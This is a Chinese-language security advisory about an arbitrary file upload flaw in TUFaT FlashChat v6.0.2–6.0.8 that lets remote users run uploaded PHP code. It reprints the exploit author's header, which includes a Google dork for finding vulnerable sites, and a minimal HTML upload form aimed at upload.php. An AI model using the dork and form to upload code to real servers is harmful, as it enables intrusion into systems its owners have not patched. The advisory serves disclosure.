发布日期:2013-10-04
更新日期:2013-11-02受影响系统:
TUFaT Flashchat v6.0.8
TUFaT Flashchat v6.0.7
TUFaT Flashchat v6.0.6
TUFaT Flashchat v6.0.5
TUFaT Flashchat v6.0.4
TUFaT Flashchat v6.0.2
描述:
--------------------------------------------------------------------------------
BUGTRAQ ID: 62852FlashChat是一款个性化聊天室,支持大部分的PHP格式的CMS系统,也可以作为独立的聊天室。FlashChat的upload.php脚本没有正确验证或过滤用户上传的文件,通过上传.php文件,远程系统会替换用户可访问路径内的文件,通过直接访问已经上传的文件,可使远程用户执行任意代码。<*来源:x-hayben21
链接:http://www.osvdb.org/98233
*>测试方法:
--------------------------------------------------------------------------------警 告以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!#######################################################
# Exploit Title: FlashChat File Upload Vulnerability
# Google Dork: intitle:FlashChat v6.0.8
# Date: 02.10.2013
# Exploit Author: x-hayben21
# Vendor Homepage: www.punish3r.com
# Software Link: http://www.tufat.com/script2.htm
# Version: v6.0.8, v6.0.2, v6.0.4, v6.0.5, v6.0.6, v6.0.7,
# Tested on: Windows, PHP 5.2
#
# Special Thanks : MaXtoR - PoLoNia
########################################################Vulnerable File : upload.php#Exploit
<form action="http://sites/script/upload.php" method="post" enctype="multipart/form-data">
<label for="file">Filename:</label>
<input type="file" name="file" id="file"><br>
<input type="submit" name="submit" value="Submit">
</form>建议:
--------------------------------------------------------------------------------
厂商补丁:TUFaT
-----
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:http://www.tufat.com/index.phpNetgear WNDR3700安全限制绕过漏洞RaidSonic IB-NAS5220及IB-NAS4220-B多个漏洞相关资讯 FlashChat FlashChat漏洞 本文评论 查看全部评论 (0)
评论声明- 尊重网上道德,遵守中华人民共和国的各项有关法律法规
- 承担一切因您的行为而直接或间接导致的民事或刑事法律责任
- 本站管理人员有权保留或删除其管辖留言中的任意内容
- 本站有权在网站内转载或引用您的评论
- 参与本评论即表明您
|
易网时代-编程资源站